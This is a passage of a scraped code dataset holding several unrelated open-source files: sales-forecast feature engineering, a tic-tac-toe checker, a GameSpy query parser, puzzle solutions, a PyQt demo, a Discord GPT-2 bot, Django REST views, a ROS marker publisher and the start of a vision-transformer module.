\"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n sku_data_list = []\n sale_price_dic = {}\n\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n dt_array = sku_data.dt.unique()\n dt_lenth = len(dt_array)\n\n arr_list = sku_data[sku_data.is_train == 1]['arranged_cnt'].tolist()\n price_list = sku_data[sku_data.is_train == 1]['w_price'].tolist()\n\n # 
将数据前移20天\n arr_array = np.concatenate([[arr_list[0]] * 20, arr_list])\n price_array = np.concatenate([[price_list[0]] * 20, price_list])\n\n # 历史销量\n itvl_avg = arr_array.cumsum() / (pd.Series(arr_array).index + 1)\n # 历史价格\n itvl_price = price_array.cumsum() / (pd.Series(price_array).index + 1)\n sale_price_dic['itvl_pred'] = ['itvl_avg', 'itvl_price']\n\n # 历史销量指数均值\n itvl_ewm_avg = pd.Series(arr_array).ewm(span=4, min_periods=1).mean()\n # 历史价格指数均值\n itvl_ewm_price = pd.Series(price_array).ewm(span=4, min_periods=1).mean()\n sale_price_dic['itvl_ewm_pred'] = ['itvl_ewm_avg', 'itvl_ewm_price']\n\n # 滑动窗口统计值\n roll_arr_obj = pd.Series(arr_array).rolling(7, min_periods=1)\n roll_price_obj = pd.Series(price_array).rolling(7, min_periods=1)\n\n itvl_roll_avg = roll_arr_obj.mean() # 销量滑动窗口均值\n itvl_roll_max = roll_arr_obj.max() # 销量滑动窗口最大值\n itvl_roll_min = roll_arr_obj.min() # 销量滑动窗口最小值\n\n itvl_roll_price_avg = roll_price_obj.mean() # 价格滑动窗口均值差值\n itvl_roll_price_max = roll_price_obj.max() # 价格滑动窗口最大值差值\n itvl_roll_price_min = roll_price_obj.min() # 价格滑动窗口最小值差值\n\n sale_price_dic['itvl_roll_avg_pred'] = ['itvl_roll_avg', 'itvl_roll_price_avg']\n sale_price_dic['itvl_roll_max_pred'] = ['itvl_roll_max', 'itvl_roll_price_max']\n sale_price_dic['itvl_roll_min_pred'] = ['itvl_roll_min', 'itvl_roll_price_min']\n\n sku_data_list.append(pd.DataFrame({'sku_id': [sku] * dt_lenth,\n 'itvl_avg': itvl_avg,\n 'itvl_price': itvl_price,\n 'itvl_ewm_avg': itvl_ewm_avg,\n 'itvl_ewm_price': itvl_ewm_price,\n 'itvl_roll_avg': itvl_roll_avg,\n 'itvl_roll_price_avg': itvl_roll_price_avg,\n 'itvl_roll_max': itvl_roll_max,\n 'itvl_roll_price_max': itvl_roll_price_max,\n 'itvl_roll_min': itvl_roll_min,\n 'itvl_roll_price_min': itvl_roll_price_min,\n 'dt': dt_array\n }))\n df_total_raw = df_total_raw.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n\n # 差价特征\n df_total_raw['itvl_avg_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_price']\n df_total_raw['itvl_ewm_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_ewm_price']\n df_total_raw['itvl_roll_avg_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_roll_price_avg']\n df_total_raw['itvl_roll_max_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_roll_price_max']\n df_total_raw['itvl_roll_min_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_roll_price_min']\n\n # 价格相关销量\n ed_val = df_total_raw['ed_val']\n price = df_total_raw['w_price']\n for key, value in sale_price_dic.items():\n la = df_total_raw[value[0]]\n lp = df_total_raw[value[1]]\n _delta_p = price - lp\n dp = _delta_p / lp\n\n ed_pred_arr = la * (1 - dp * ed_val)\n ed_pred_arr[ed_pred_arr < 0] = 0\n\n df_total_raw = df_total_raw.join(pd.DataFrame(ed_pred_arr, columns=[key]))\n\n return df_total_raw.fillna(0.)\n\n @staticmethod\n def same_cat_rebate(data):\n \"\"\"\n 竞品折扣信息\n :param data: 原始数据\n :return: 竞品折扣\n \"\"\"\n # 构造差价特征\n data['price_diff_seq'] = data['csu_origin_price'] - data['seq_price']\n data['price_diff_discount'] = data['csu_origin_price'] - data['discount_price']\n data['price_diff_sd'] = data['discount_price'] - data['seq_price']\n\n # 构造折扣特征\n data['seq_rebate'] = data['price_diff_seq'] / data['csu_origin_price']\n data['pro_rebate'] = data['price_diff_discount'] / data['csu_origin_price']\n\n # 秒杀折扣\n seq_data = data.groupby(['dt', 'cat2_name'], as_index=False)['seq_rebate'] \\\n .agg({'max_seq_rebate': np.max, 'mean_seq_rebate': np.mean})\n\n # 大促折扣\n pro_data = data.groupby(['dt', 'cat2_name'], as_index=False)['pro_rebate'] \\\n 
.agg({'max_pro_rebate': np.max, 'mean_pro_rebate': np.mean})\n\n        # 合并数据\n        rebate_data = seq_data.merge(pro_data, how='outer', on=['dt', 'cat2_name'])\n\n        return data.merge(rebate_data, how='left', on=['dt', 'cat2_name']).fillna(0.)\n\n    def his_sale_avg(self, raw_data):\n        \"\"\"\n        移动平均销量特征\n        \"\"\"\n        data = raw_data.sort_values(self.dt_field)\n        sku_data_list = []\n\n        for sku, sku_data in data.groupby('sku_id'):\n            df_sku = sku_data[sku_data.is_train == 1]\n            arr_list = df_sku['arranged_cnt']\n\n            # 计算7天/15天/30天移动平均值\n            roll_7d_avg = arr_list.rolling(7, min_periods=1).mean()\n            roll_15d_avg = arr_list.rolling(15, min_periods=1).mean()\n            roll_30d_avg = arr_list.rolling(30, min_periods=1).mean()\n\n            # 计算(训练集)加权均值\n            if self.cat1_id in [10021228]:\n                his_avg = roll_7d_avg * 0.6 + roll_15d_avg * 0.3 + roll_30d_avg * 0.1\n            else:\n                his_avg = (roll_7d_avg + roll_15d_avg + roll_30d_avg) / 3.\n\n            # 均值外推, 覆盖未来20天\n            arr_and_avg = arr_list.tolist()\n            arr_and_avg.append(his_avg.iloc[-1])\n            for i in range(19):\n                if len(arr_and_avg) < 7:\n                    avg_7d = np.mean(arr_and_avg)\n                else:\n                    avg_7d = np.mean(arr_and_avg[-7:])\n\n                if len(arr_and_avg) < 15:\n                    avg_15d = np.mean(arr_and_avg)\n                else:\n                    avg_15d = np.mean(arr_and_avg[-15:])\n\n                if len(arr_and_avg) < 30:\n                    avg_30d = np.mean(arr_and_avg)\n                else:\n                    avg_30d = np.mean(arr_and_avg[-30:])\n                if self.cat1_id in [10021228]:\n                    arr_and_avg.append(avg_7d * 0.6 + avg_15d * 0.3 + avg_30d * 0.1)\n                else:\n                    arr_and_avg.append((avg_7d + avg_15d + avg_30d) / 3.)\n            his_avg = np.concatenate([[his_avg.iloc[0]], his_avg, arr_and_avg[-19:]])\n\n            try:\n                sku_data_list.append(pd.DataFrame({'sku_id': sku,\n                                                   'dt': sku_data.dt,\n                                                   'his_avg': his_avg}))\n            except Exception:\n                print(\"{} 历史销量特征制造异常!\".format(sku))\n                continue\n        # 最终结果\n        data = data.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt']).dropna()\n        return data\n\n    def his_pro_sale_avg(self, raw_data):\n        \"\"\"\n        区分促销/非促销的历史销量特征\n        :param raw_data: 原始数据\n        :return: 历史销量\n        \"\"\"\n        df_total = raw_data.sort_values(self.dt_field).reset_index(drop=True)\n\n        # 区分促销/非促销数据\n        # 非促销数据\n        df_total_normal = df_total[(df_total['pro_num'] == 0) &\n                                   (df_total['seq_num'] == 0) &\n                                   (df_total['csu_redu_num'] == 0)]\n        # 促销数据\n        df_total_pro = df_total[~df_total.index.isin(df_total_normal.index)]\n\n        sku_data_list = []\n        for data in [df_total_normal, df_total_pro]:\n            for sku, sku_data in data.groupby('sku_id'):\n                df_sku = sku_data[sku_data.is_train == 1]\n\n                # 训练集没有数据\n                if len(df_sku) == 0:\n                    continue\n\n                arr_list = df_sku['arranged_cnt']\n                days = len(sku_data[sku_data.is_train == 0]) - 1\n\n                roll_7d_avg = arr_list.rolling(7, min_periods=1).mean()\n                roll_15d_avg = arr_list.rolling(15, min_periods=1).mean()\n                roll_30d_avg = arr_list.rolling(30, min_periods=1).mean()\n\n                # 计算(训练集)加权均值\n                his_avg = roll_7d_avg * 0.7 + roll_15d_avg * 0.2 + roll_30d_avg * 0.1\n\n                # 均值外推, 覆盖测试集\n                # 测试集没有数据\n                if days == -1:\n                    his_avg = np.concatenate([[his_avg.iloc[0]], his_avg[:-1]])\n                # 测试集只有一天\n                elif days == 0:\n                    his_avg = np.concatenate([[his_avg.iloc[0]], his_avg])\n                else:\n                    arr_and_avg = arr_list.tolist()\n                    arr_and_avg.append(his_avg.iloc[-1])\n\n                    for i in range(days):\n                        if len(arr_and_avg) < 7:\n                            avg_7d = np.mean(arr_and_avg)\n                        else:\n                            avg_7d = np.mean(arr_and_avg[-7:])\n\n                        if len(arr_and_avg) < 15:\n                            avg_15d = np.mean(arr_and_avg)\n                        else:\n                            avg_15d = np.mean(arr_and_avg[-15:])\n\n                        if len(arr_and_avg) < 30:\n                            avg_30d = np.mean(arr_and_avg)\n                        else:\n                            avg_30d = np.mean(arr_and_avg[-30:])\n                        arr_and_avg.append(avg_7d * 0.7 + avg_15d * 0.2 + avg_30d * 0.1)\n                    his_avg = np.concatenate([[his_avg.iloc[0]], his_avg, arr_and_avg[-days:]])\n\n                try:\n                    sku_data_list.append(pd.DataFrame({'sku_id': sku,\n                                                       'dt': sku_data.dt,\n                                                       'pro_his_avg': his_avg}))\n                except Exception:\n                    print(\"{} 历史(促销)销量特征制造异常!\".format(sku))\n                    continue\n        final_data = df_total.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n\n        # (训练集无数据导致的)空值处理\n        final_data.loc[final_data['pro_his_avg'].isnull() == True, 'pro_his_avg'] \\\n            = final_data.loc[final_data['pro_his_avg'].isnull() == True, 'his_avg']\n        return final_data\n\n    def create_features(self, total_data, total_train_data):\n        \"\"\"\n        特征制造函数\n        :param total_data: 原始数据\n        :param total_train_data: 训练数据\n        :return: (合并后的)特征数据\n        \"\"\"\n        all_data = []\n        for wh_id, data in total_data.groupby('wh_id'):\n            try:\n                # 日期处理\n                data['year'] = pd.to_datetime(data[self.dt_field]).dt.year\n                data['month'] = pd.to_datetime(data[self.dt_field]).dt.month\n                data['day'] = pd.to_datetime(data[self.dt_field]).dt.day\n\n                train_data = total_train_data[total_train_data.wh_id == wh_id]\n                train_data['month'] = pd.to_datetime(train_data[self.dt_field]).dt.month\n\n                # 特征生产\n                data = DerivedFeature.cnt_band_func(data)\n                data = self.his_sale_avg(data)\n                if self.cat1_id in [10021228]:\n                    data = self.price_derived_features(data)\n                    data = self.get_price_elasticity(data)\n                    data = self.ed_pred_sale(data)\n                    data = self.get_price_statistic_features(data)\n                else:\n                    data = self.his_pro_sale_avg(data)\n                    data = self.same_cat_rebate(data)\n                data = self.get_statistic_features(data)\n                data = self.pro_statistic_features(data)\n                data = self.seasonal_count(data, train_data)\n                data = self.get_sale_ratio(data, train_data)\n                byr_cols = [col for col in data.columns if '_byrs' in col]\n                data = self.byrs_count(data, train_data, col_list=byr_cols)\n                all_data.append(data)\n            except Exception:\n                print('%s 仓 %s 品类特征制造异常!' % (wh_id, self.cat1_id))\n                continue\n        return pd.concat(all_data)\n","repo_name":"Vinson1021/learngit","sub_path":"PROM_MODEL/dependencies/algorithm/cat_model/cat1_common_derived_features.py","file_name":"cat1_common_derived_features.py","file_ext":"py","file_size_in_byte":39420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"23383550261","text":"class GameStatus(object):\r\n    X_WON = 0\r\n    O_WON = 1\r\n    DRAW = 2\r\n    IN_PROGRESS = 3\r\n    UNKNOWN = 4\r\n\r\n    STATUS_MESSAGES = {\r\n        X_WON: \"X won\",\r\n        O_WON: \"O won\",\r\n        DRAW: \"Draw\",\r\n        IN_PROGRESS: \"Game has not completed\",\r\n    }\r\n    \r\nclass Symbols(object):\r\n    X_SYMB = 'X'\r\n    O_SYMB = 'O'\r\n    JOKER = 'T'\r\n    EMPTY = '.'\r\n\r\nclass GameBoard(object):\r\n    '''\r\n    @input: board_content - a list of strings, each representing a row in the board.\r\n    '''\r\n    def __init__(self, board_content):\r\n        self._rows = board_content\r\n        self._cols = [''.join(x) for x in list(zip(*board_content))]\r\n        self._status = GameStatus.UNKNOWN\r\n    \r\n    def determine_status(self,):\r\n        self._status = GameStatus.DRAW\r\n        # generating the diagonal\r\n        diag1 = [''.join(self._rows[i][i] for i in range(len(self._rows)))]\r\n        diag_2_indexes = list(zip(range(len(self._rows)-1, -1, -1), range(len(self._cols))))\r\n        diag2 = [''.join(self._rows[i][j] for i,j in diag_2_indexes)]\r\n        for element in self._rows + self._cols + diag1 + diag2:\r\n            #import pdb\r\n            #pdb.set_trace()\r\n            first = element[0] if element[0] != Symbols.JOKER else element[1]\r\n            found = True\r\n            for symbol in element:\r\n                if symbol == Symbols.EMPTY:\r\n                    self._status = GameStatus.IN_PROGRESS\r\n                    found = False\r\n                    break\r\n                elif 
symbol != first and symbol != Symbols.JOKER:\r\n found = False\r\n break\r\n if found:\r\n if first == Symbols.X_SYMB:\r\n self._status = GameStatus.X_WON\r\n if first == Symbols.O_SYMB:\r\n self._status = GameStatus.O_WON\r\n return\r\n \r\n def get_game_status_message(self,):\r\n if self._status == GameStatus.UNKNOWN:\r\n self.determine_status()\r\n return GameStatus.STATUS_MESSAGES[self._status]","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/2878.py","file_name":"2878.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12637134702","text":"# coding: utf-8\nfrom __future__ import unicode_literals\nimport re\nfrom collections import OrderedDict\n\nfrom .. import Server as BaseServer\nfrom ..exceptions import ResponseIncomplete, ResponseMalformed\n\n\nclass Server(BaseServer):\n packets = {\n 'status': b'\\\\status\\\\',\n }\n parsers = (\n 'parse_packets',\n 'format_packets',\n )\n formatters = (\n 'format_response',\n )\n\n def parse_packets(self, packets):\n \"\"\"\n Parse and sort packets received in a response.\n\n :param packets: List of received packets\n :type packets: list\n :return: List of packets sorted in the original order\n :type return: list\n\n :raises ResponseIncomplete: if not enough packets\n \"\"\"\n packets, count = self._sort_packets(packets)\n # check the packet length\n if not count or count > len(packets):\n raise ResponseIncomplete(\n 'expected length of {} does not match the actual length {}'.format(count, len(packets))\n )\n return packets\n\n def format_packets(self, packets):\n \"\"\"\n Attempt to sort packets in the original order and parse their contents.\n\n :param packets: List of packets' contents\n :type packets: list\n :return: List of params\n :type return: list\n \"\"\"\n return self._parse_params(u''.join(packets))\n\n def format_response(self, response):\n \"\"\"\n Turn a formatted response data into an ordered dict.\n\n :param response: Formatted response\n :type response: tuple\n :return: Response dict\n :type return: collections.OrderedDict\n \"\"\"\n return OrderedDict(response)\n\n def _sort_packets(self, packets):\n count = None\n is_final = False\n numbered = {}\n for data in packets:\n data = self._decode(data)\n id = None\n for param, value in self._parse_params(data):\n if id is None and param in ('statusresponse', 'queryid'):\n # \\statusresponse\\1 or \\queryid\\1\n try:\n # attempt to read the next piece of data\n id = int(value)\n except IndexError:\n raise ResponseMalformed('invalid queryid')\n # \\queryid\\gs1\n except ValueError:\n id = 1\n else:\n # statusresponse is zero based\n id += (param == 'statusresponse')\n # this is the final packet\n elif param == 'final':\n is_final = True\n if is_final:\n count = id\n if id is None:\n raise ResponseMalformed('failed to read packet id')\n numbered[id] = self._fix_packet_contents(data)\n # sort packets by their ids\n return [value for key, value in sorted(numbered.items())], count\n\n def _parse_params(self, data):\n \"\"\"\n Split a response into a list of params.\n\n :param data: Response contents\n :type data: unicode\n :return: List of (key, value) param tuples\n :type return: list\n \"\"\"\n params = []\n split = data.split('\\\\')\n for i, key in enumerate(split):\n # skip values\n if not i % 2:\n continue\n # fetch the value\n try:\n value = split[i + 1]\n except IndexError:\n pass\n else:\n params.append((key, value))\n return params\n\n 
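# Illustrative check (hypothetical payload, not from the original module):
    # _parse_params(u'\\gamename\\ut\\mapname\\DM-Deck16') would return
    # [(u'gamename', u'ut'), (u'mapname', u'DM-Deck16')].\n\n    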
def _fix_packet_contents(self, data):\n        \"\"\"\n        Remove standard non-compliant headers from packet contents.\n\n        :param data: Packet contents\n        :type data: unicode\n        :return: Packet contents\n        :type return: unicode\n        \"\"\"\n        return re.sub(r'(?:^\\\\statusresponse\\\\\\d+|\\\\eof\\\\$)', '', data)\n\n    def _decode(self, data):\n        \"\"\"\n        Decode a piece of data into a unicode string.\n\n        :param data: Data\n        :return: Unicode string\n        \"\"\"\n        try:\n            return data.decode('utf-8', errors='ignore')\n        except (AttributeError, UnicodeDecodeError):\n            return self._decode(str(data))\n","repo_name":"sergeii/python-serverquery","sub_path":"serverquery/protocol/gamespy1.py","file_name":"gamespy1.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24760687571","text":"def compute_priorities(rucksack):\n    element = set(rucksack[0]) & set(rucksack[1]) & set(rucksack[2])\n    num = ord(element.pop())\n    if num > 96:\n        return num - 96\n    else:\n        return num - 38\n\n\nwith open('input.txt', 'r') as input:\n    data = input.read().split('\\n')\n    number_of_groups = int(len(data)/3)\n    grouped_data = [data[i*3:i*3+3] for i in range(number_of_groups)]\n    result = map(compute_priorities, grouped_data)\n","repo_name":"WiebkeFr/advent-of-code-2022","sub_path":"day-03/part-02.py","file_name":"part-02.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6224866092","text":"from PyQt5.Qt import *\nimport sys\n\n\napp = QApplication(sys.argv)\nwindow = QWidget()\nwindow.resize(500, 500)\nman = QRadioButton('Male', window)\nman.move(0, 30)\nwomen = QRadioButton('Female', window)\n\nyes = QRadioButton('yes', window)\nyes.move(50,0)\nno = QRadioButton('no', window)\nno.move(50,30)\n\n'''\nPut man and women into their own button group, so that they are no longer\nmutually exclusive with yes and no.\n'''\nsex_group = QButtonGroup(window)\nsex_group.addButton(man)\nsex_group.addButton(women)\n\n'''\nPut yes and no into their own button group, so that they are no longer\nmutually exclusive with man and women.\n'''\nanswer_group = QButtonGroup(window)\nanswer_group.addButton(yes)\nanswer_group.addButton(no)\n\nwindow.show()\nsys.exit(app.exec())","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/按钮类型/单选按钮/设置按钮组,多组单选按钮互不影响.py","file_name":"设置按钮组,多组单选按钮互不影响.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39499762471","text":"# https://leetcode.com/contest/weekly-contest-118/problems/powerful-integers/\n\nclass Solution(object):\n    def powerfulIntegers(self, x, y, bound):\n        \"\"\"\n        :type x: int\n        :type y: int\n        :type bound: int\n        :rtype: List[int]\n        \"\"\"\n        # x or y = 1\n        # duplicate\n        nxs, nx = [], 1\n        while nx < bound:\n            nxs.append(nx)\n            if x == 1:\n                break\n            nx *= x\n        res, ny = set(), 1\n        while ny < bound:\n            for nx in nxs:\n                if nx + ny > bound:\n                    break\n                res.add(nx + ny)\n            if y == 1:\n                break\n            ny *= y\n        return list(res)\n    \n","repo_name":"jwyx3/practices","sub_path":"leetcode/array/powerful-integers.py","file_name":"powerful-integers.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2478761204","text":"import configparser\n\nimport discord\n\nfrom discord_bot.commands.help_command import HelpCommand\nfrom discord_bot.commands.story_command import StoryCommand\nfrom discord_bot.commands.video_search_command import VideoSearchCommand\nfrom discord_bot.commands.write_command 
import WriteCommand\nfrom discord_bot.commands.chat_command import ChatCommand\nfrom discord_bot.keep_alive import keep_alive\n\nfrom generation.generate import Generate\n\nclient = discord.Client()\ngenerate = Generate()\n# load discord bot configs\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\ndiscord_config = config['discord']\ndebug_mode = discord_config.getboolean('debug')\ngame_playing_status = discord_config['game_playing_status']\n\n# prepare command handlers\nwrite_command = WriteCommand(client, config, generate)\nstory_command = StoryCommand(client, config)\nvideo_search_command = VideoSearchCommand(client, config)\nchat_command = ChatCommand(client, config, generate)\n\navailable_commands = [write_command, story_command, video_search_command]\nhelp_command = HelpCommand(client, available_commands)\n\n\n# bot ready event handler\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n if debug_mode:\n print('DEBUG MODE ENABLED')\n # set bot status\n await client.change_presence(activity=discord.Game(game_playing_status))\n\n\n# message event handler\n@client.event\nasync def on_message(message):\n # if the message is from the bot itself, skip it\n if message.author == client.user:\n return\n\n # if bot is set to debug mode,\n # and the message is not from one of the debug channels defined in the config file, skip it\n if debug_mode:\n # channel ids are integers\n debug_channel_ids = [int(s) for s in discord_config['debug_channel_ids'].split(',')]\n if message.channel.id not in debug_channel_ids:\n return\n\n # video search command\n # if the message is from the designated channel for video searching\n if message.channel.id in video_search_command.get_allowed_channel_ids():\n video_search_command.execute(message)\n\n # story command\n if message.content.startswith(story_command.get_command_prefix()):\n story_command.execute(message)\n\n # write command\n elif message.content.startswith(write_command.get_command_prefix()):\n write_command.execute(message)\n\n # message was sent in the chat channels\n elif message.channel.id in chat_command.get_allowed_channel_ids():\n chat_command.execute(message)\n\n # display the help message\n elif message.content.startswith(help_command.get_command_prefix()):\n help_command.execute(message)\n\nkeep_alive()\n\nclient.run(discord_config['key'])\n","repo_name":"czjyyds/gpt2-story-generator","sub_path":"src/discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"12497203588","text":"from rest_framework import status\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom rest_framework.authentication import TokenAuthentication\r\nfrom rest_framework.pagination import PageNumberPagination\r\nfrom rest_framework.generics import ListAPIView\r\nfrom rest_framework.filters import SearchFilter, OrderingFilter\r\nfrom expose.models import Expose\r\nfrom expose.api.serializers import ExposeSerializer, ExposeCreateSerializer, ExposeUpdateSerializer\r\nfrom django.utils.translation import ugettext_lazy as _\r\nimport logging\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n@api_view(['GET', ])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_detail_expose_view(request, slug):\r\n try:\r\n expose = Expose.objects.get(slug=slug)\r\n 
except Expose.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'GET':\r\n serializer = ExposeSerializer(expose)\r\n return Response(serializer.data)\r\n\r\n\r\n@api_view(['PUT', ])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_update_expose_view(request, slug):\r\n try:\r\n expose = Expose.objects.get(slug=slug)\r\n except Expose.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'PUT':\r\n serializer = ExposeUpdateSerializer(expose, data=request.data, partial=True)\r\n data = {}\r\n if serializer.is_valid():\r\n serializer.save()\r\n data['response'] = expose.pk\r\n data['title'] = expose.title\r\n data['body'] = expose.body\r\n data['slug'] = expose.slug\r\n data['date_updated'] = expose.date_updated\r\n image_url = str(request.build_absolute_uri(expose.image.url))\r\n if \"?\" in image_url:\r\n image_url = image_url[:image_url.rfind(\"?\")]\r\n data['image'] = image_url\r\n data['exposeunit'] = expose.exposeunit.name\r\n return Response(data=data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view(['DELETE', ])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_delete_expose_view(request, slug):\r\n try:\r\n expose = Expose.objects.get(slug=slug)\r\n except Expose.DoesNotExist:\r\n return Response(status=status.HTTP_404_NOT_FOUND)\r\n\r\n if request.method == 'DELETE':\r\n operation = expose.delete()\r\n data = {}\r\n if operation:\r\n data['response'] = _(\"response.success\")\r\n return Response(data=data)\r\n\r\n\r\n@api_view(['POST'])\r\n@permission_classes((IsAuthenticated,))\r\ndef api_create_expose_view(request):\r\n if request.method == 'POST':\r\n\r\n data = request.data\r\n serializer = ExposeCreateSerializer(data=data)\r\n data = {}\r\n\r\n if serializer.is_valid():\r\n expose = serializer.save()\r\n data['response'] = _(\"response.success\")\r\n data['pk'] = expose.pk\r\n data['title'] = expose.title\r\n data['body'] = expose.body\r\n data['slug'] = expose.slug\r\n data['date_updated'] = expose.date_updated\r\n image_url = str(request.build_absolute_uri(expose.image.url))\r\n if \"?\" in image_url:\r\n image_url = image_url[:image_url.rfind(\"?\")]\r\n data['image'] = image_url\r\n data['exposeunit'] = expose.exposeunit.name\r\n return Response(data=data)\r\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass ApiExposeListView(ListAPIView):\r\n queryset = Expose.objects.all()\r\n serializer_class = ExposeSerializer\r\n authentication_classes = (TokenAuthentication,)\r\n permission_classes = (IsAuthenticated,)\r\n pagination_class = PageNumberPagination\r\n filter_backends = (SearchFilter, OrderingFilter)\r\n search_fields = ('title', 'body', 'exposeunit__name')\r\n","repo_name":"Am-Coder/Brainonet","sub_path":"expose/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21098309056","text":"class Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n if len(s) != len(t):\n return False\n \n d1, d2 = {}, {}\n \n for letter in s:\n d1[letter] = d1.get(letter, 0) + 1\n \n for letter in t:\n d2[letter] = d2.get(letter, 0) + 1\n \n return (d1 == d2)\n 
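# Illustrative usage (hypothetical calls):
    #   Solution().isAnagram('anagram', 'nagaram')   # -> True
    #   Solution().isAnagram('rat', 'car')            # -> False\n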
","repo_name":"bharathithal/leetCodeSubmissions","sub_path":"242-valid-anagram/242-valid-anagram.py","file_name":"242-valid-anagram.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17379212024","text":"#!/usr/bin/env python\n\n# ROS data types\nfrom visualization_msgs.msg import Marker\n# ROS Libraries\nimport rospy\nimport tf\n\n\nif __name__ == '__main__':\n\trospy.init_node('marker_pub')\n\tpub = rospy.Publisher(\"visualization_marker\", Marker)\n\trate = rospy.Rate(10)\n\n\twhile not rospy.is_shutdown():\n\t\tmark \t\t\t\t\t\t= Marker()\n\t\tmark.header.frame_id \t\t= \"base_link\"\n\t\tmark.header.stamp \t\t\t= rospy.Time.now()\n\t\tmark.ns \t\t\t\t\t= \"my_namespace\"\n\t\tmark.id \t\t\t\t\t= 0\n\t\tmark.type \t\t\t\t\t= 1\n\t\tmark.action \t\t\t\t= 0\n\t\tmark.pose.position.x\t\t= 4\n\t\tmark.pose.position.y \t\t= 0\n\t\tmark.pose.position.z \t\t= 0\n\t\tmark.pose.orientation.x \t= 0.0\n\t\tmark.pose.orientation.y \t= 0.0\n\t\tmark.pose.orientation.z \t= 0.0\n\t\tmark.pose.orientation.w \t= 1.0\n\t\tmark.scale.x \t\t\t\t= 0.1\n\t\tmark.scale.y \t\t\t\t= 9.14\n\t\tmark.scale.z \t\t\t\t= 0.1\n\t\tmark.color.a \t\t\t\t= 1.0\n\t\tmark.color.r \t\t\t\t= 0.0\n\t\tmark.color.g \t\t\t\t= 1.0\n\t\tmark.color.b \t\t\t\t= 0.0\n\n\t\tpub.publish(mark)\n\t\trate.sleep()","repo_name":"OSUrobotics/cargo_align","sub_path":"src/marker_pub.py","file_name":"marker_pub.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43480136635","text":"import torch\nimport torch.nn as nn\nfrom functools import partial\nfrom einops import rearrange, repeat\nimport torch.nn.functional as nnf\n\nfrom torchvision.utils import save_image, make_grid\nimport numpy as np\nimport cv2\n\nimport random\nrandom.seed(123)\n\nfrom timm.models.vision_transformer import VisionTransformer, _cfg\nfrom timm.models.registry import register_model\nfrom timm.models.layers import trunc_normal_, helpers, DropPath\nfrom timm.models.resnet import Bottleneck, ResNet\nfrom timm.models.resnet import _cfg as _cfg_resnet\nfrom timm.models.helpers import build_model_with_cfg\n\n__all__ = [\n 'deit_tiny_patch16_224', 'deit_small_patch16_224', 'deit_base_patch16_224',\n 'deit_tiny_distilled_patch16_224', 'deit_small_distilled_patch16_224',\n 'deit_base_distilled_patch16_224', 'deit_base_patch16_384',\n 'deit_base_distilled_patch16_384',\n]\n\ndef TokensCutOff(x, tua = 0.4):\n CLS, DIS = x[:, 0, :].unsqueeze(1), x[:, 1, :].unsqueeze(1)\n tokens = x[:, 2:, :]\n B, N, C = tokens.shape\n\n mask = torch.ones(B, N, requires_grad=False).cuda()\n prob = torch.rand(B, N, requires_grad=False).cuda()\n mask = torch.where(prob > tua, mask, torch.full_like(mask, 1e-8))\n TokenMask = mask.view(B, N, 1).expand_as(tokens)\n\n x = tokens * TokenMask\n x = torch.cat((CLS, DIS, x), dim=1)\n return x\n\ndef FeatureCutOff(x, tua = 0.4):\n CLS, DIS = x[:, 0, :].unsqueeze(1), x[:, 1, :].unsqueeze(1)\n tokens = x[:, 2:, :]\n B, N, C = tokens.shape\n\n mask = torch.ones(B, C, requires_grad=False).cuda()\n prob = torch.rand(B, C, requires_grad=False).cuda()\n mask = torch.where(prob > tua, mask, torch.full_like(mask, 1e-8))\n TokenMask = mask.view(B, 1, C).expand_as(tokens)\n \n x = tokens * TokenMask\n x = torch.cat((CLS, DIS, x), dim=1)\n return x\n\ndef shuffle_unit(features, shift, group, begin=0, 